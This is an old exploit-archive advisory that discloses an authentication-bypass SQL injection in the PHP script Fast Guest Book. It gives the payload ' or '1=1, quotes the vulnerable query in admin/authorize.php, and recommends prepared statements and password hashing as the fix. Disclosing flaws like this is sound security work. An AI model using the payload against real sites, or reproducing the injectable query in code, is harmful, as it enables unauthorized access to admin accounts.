###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
    _      _       _          _      _   _
   / \    | |     | |        / \    | | | |
  / _ \   | |     | |       / _ \   | |_| |
 / ___ \  | |___  | |___   / ___ \  |  _  |   IN THE NAME OF
/_/   \_\ |_____| |_____| /_/   \_\ |_| |_|

==============================================================================
==============================================================================
   Fast Guest Book (Auth Bypass) SQL Injection Vulnerability
==============================================================================

[»] Script:    [ Fast Guest Book ]
[»] Language:  [ PHP ]
[»] Website:   [ http://fastcreators.com/products/guestbook/download.php ]
[»] Founder:   [ Moudi ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , and all hackers... ]
[»] Team:      [ EvilWay ]

###########################################################################

===[ Exploit ]===

[»] ' or '1=1

===[ BUG ]===

[»] Bug In \admin\authorize.php

$query = "select * from admin where userid='{$_POST['uname']}' AND pass='{$_POST['pass']}'";

[»] Root cause: both POST fields are interpolated into the SQL string without escaping or parameter binding, so a quote character in either field changes the WHERE clause instead of being compared as data.
[»] Fix: build the query as a prepared statement with bound parameters (PDO or mysqli), select the row by userid only, and check the password in PHP with password_verify() against a password_hash() value rather than comparing it inside the query.

Author: Moudi

###########################################################################

# milw0rm.com [2009-01-11]